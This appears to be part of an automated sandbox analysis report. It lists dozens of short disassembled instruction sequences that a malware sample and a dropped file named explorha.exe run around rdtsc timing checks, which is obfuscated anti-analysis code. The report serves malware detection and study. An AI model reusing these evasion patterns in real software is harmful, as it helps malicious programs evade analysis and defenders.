Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 517086D second address: 517089B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC734E5F781h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 517089B second address: 517089F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 517089F second address: 51708B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51708B2 second address: 51708B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51708B7 second address: 51708F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007FC734E5F787h 0x00000011 sub ebx, ebx 0x00000013 jmp 00007FC734E5F77Fh 0x00000018 test esi, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov cl, ABh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51708F3 second address: 51708F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51708F9 second address: 51708FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51708FD second address: 5170911 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FC7A6627AFFh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170911 second address: 5170917 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170917 second address: 5170952 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882082h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007FC734882080h 0x00000015 mov ecx, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov bx, B2C0h 0x0000001e mov di, 3AECh 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170952 second address: 51709DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 0D97h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FC7A6C051BDh 0x00000010 pushad 0x00000011 call 00007FC734E5F77Fh 0x00000016 mov bx, si 0x00000019 pop eax 0x0000001a pushad 0x0000001b mov dx, E176h 0x0000001f push edi 0x00000020 pop eax 0x00000021 popad 0x00000022 popad 0x00000023 test byte ptr [76FA6968h], 00000002h 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FC734E5F77Fh 0x00000031 xor eax, 64ED01FEh 0x00000037 jmp 00007FC734E5F789h 0x0000003c popfd 0x0000003d mov esi, 03759647h 0x00000042 popad 0x00000043 jne 00007FC7A6C0516Fh 0x00000049 pushad 0x0000004a mov eax, 5179073Fh 0x0000004f movzx eax, bx 0x00000052 popad 0x00000053 mov edx, dword ptr [ebp+0Ch] 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FC734E5F77Ah 0x0000005d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51709DC second address: 5170A03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC734882085h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170A03 second address: 5170A48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC734E5F781h 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 mov ax, 2383h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC734E5F786h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170A48 second address: 5170A55 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170A55 second address: 5170A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC734E5F77Fh 0x0000000a sub si, E98Eh 0x0000000f jmp 00007FC734E5F789h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170A89 second address: 5170AAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC73488207Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170AAD second address: 5170AB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170AB3 second address: 5170AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170AB7 second address: 5170AEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007FC734E5F77Ah 0x00000015 sub cx, F198h 0x0000001a jmp 00007FC734E5F77Bh 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170AEA second address: 5170B29 instructions: 0x00000000 rdtsc 0x00000002 mov bl, al 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, edx 0x00000008 popad 0x00000009 push dword ptr [ebp+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushfd 0x00000012 jmp 00007FC734882086h 0x00000017 jmp 00007FC734882085h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170B69 second address: 5170BB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b mov cl, 3Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007FC734E5F77Fh 0x00000015 jmp 00007FC734E5F783h 0x0000001a popfd 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170BB0 second address: 5170BF5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC734882088h 0x00000008 adc eax, 21024F08h 0x0000000e jmp 00007FC73488207Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC734882080h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170BF5 second address: 5170BFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170BFB second address: 5170C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC73488207Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170C0C second address: 5170C10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180A7B second address: 5180A80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180A80 second address: 5180AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FC734E5F77Eh 0x0000000d mov ebp, esp 0x0000000f jmp 00007FC734E5F780h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180AAF second address: 5180AB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180AB5 second address: 5180AC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F77Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5200725 second address: 5200729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5200729 second address: 520072D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 520072D second address: 5200733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F08FB second address: 51F092D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 mov eax, 5BC62463h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FC734E5F789h 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov dh, 5Bh 0x0000001a mov di, cx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F092D second address: 51F0953 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC73488207Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F0770 second address: 51F0786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F0786 second address: 51F07A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882087h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F07A1 second address: 51F07B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F784h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F07B9 second address: 51F07BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F07BD second address: 51F0854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx esi, bx 0x0000000d mov esi, edi 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 mov edx, 7FC2EC24h 0x00000017 pushfd 0x00000018 jmp 00007FC734E5F77Dh 0x0000001d sbb cl, 00000066h 0x00000020 jmp 00007FC734E5F781h 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FC734E5F783h 0x00000032 sbb si, E59Eh 0x00000037 jmp 00007FC734E5F789h 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007FC734E5F780h 0x00000043 sub esi, 390B9F98h 0x00000049 jmp 00007FC734E5F77Bh 0x0000004e popfd 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F0854 second address: 51F0881 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC73488207Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190094 second address: 51900B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51900B1 second address: 5190129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 8Dh 0x00000005 pushfd 0x00000006 jmp 00007FC734882088h 0x0000000b sub ax, D908h 0x00000010 jmp 00007FC73488207Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007FC734882086h 0x0000001f push eax 0x00000020 pushad 0x00000021 mov bx, E614h 0x00000025 mov ax, bx 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov edi, ecx 0x0000002f pushfd 0x00000030 jmp 00007FC73488207Ch 0x00000035 or si, CDC8h 0x0000003a jmp 00007FC73488207Bh 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190129 second address: 519014B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 3Bh 0x00000005 push ecx 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FC734E5F77Fh 0x00000014 pop ecx 0x00000015 mov bh, 1Ch 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 519014B second address: 5190197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC734882081h 0x00000009 sub cx, 7046h 0x0000000e jmp 00007FC734882081h 0x00000013 popfd 0x00000014 mov si, CAF7h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC734882084h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190197 second address: 519019B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 519019B second address: 51901A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51901A1 second address: 51901A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51901A7 second address: 51901AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F0BF4 second address: 51F0C8F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC734E5F77Dh 0x00000008 add ecx, 21777E36h 0x0000000e jmp 00007FC734E5F781h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push dword ptr [ebp+0Ch] 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FC734E5F77Ch 0x00000021 or cx, 5D58h 0x00000026 jmp 00007FC734E5F77Bh 0x0000002b popfd 0x0000002c call 00007FC734E5F788h 0x00000031 push esi 0x00000032 pop edx 0x00000033 pop esi 0x00000034 popad 0x00000035 push dword ptr [ebp+08h] 0x00000038 jmp 00007FC734E5F77Dh 0x0000003d push 01C0D903h 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FC734E5F789h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F0C8F second address: 51F0C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F0C93 second address: 51F0C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F0C99 second address: 51F0CC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ah 0x00000005 call 00007FC73488207Fh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [esp], 01C1D901h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov di, cx 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F0D73 second address: 51F0D82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F0D82 second address: 51F0D9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734882084h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8D62D6 second address: 8D62DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8D62DE second address: 8D62E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8D62E3 second address: 8D62E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8D62E9 second address: 8D62ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E484F second address: 8E4855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4855 second address: 8E485D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4B36 second address: 8E4B4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4B4B second address: 8E4B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4B51 second address: 8E4B7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007FC734E5F776h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007FC734E5F781h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC734E5F77Dh 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4CB5 second address: 8E4CBB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4CBB second address: 8E4CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4CC1 second address: 8E4CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4CC8 second address: 8E4CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC734E5F781h 0x0000000f jnc 00007FC734E5F776h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4CE9 second address: 8E4CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4CED second address: 8E4CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4E39 second address: 8E4E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734882085h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4E52 second address: 8E4E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4E56 second address: 8E4E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jp 00007FC734882076h 0x0000000f pop ebx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E7781 second address: 8E77B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a add dword ptr [ebp+124490C3h], edx 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D1CBDh], ebx 0x00000018 push 2C73CFFEh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC734E5F785h 0x00000024 rdtsc
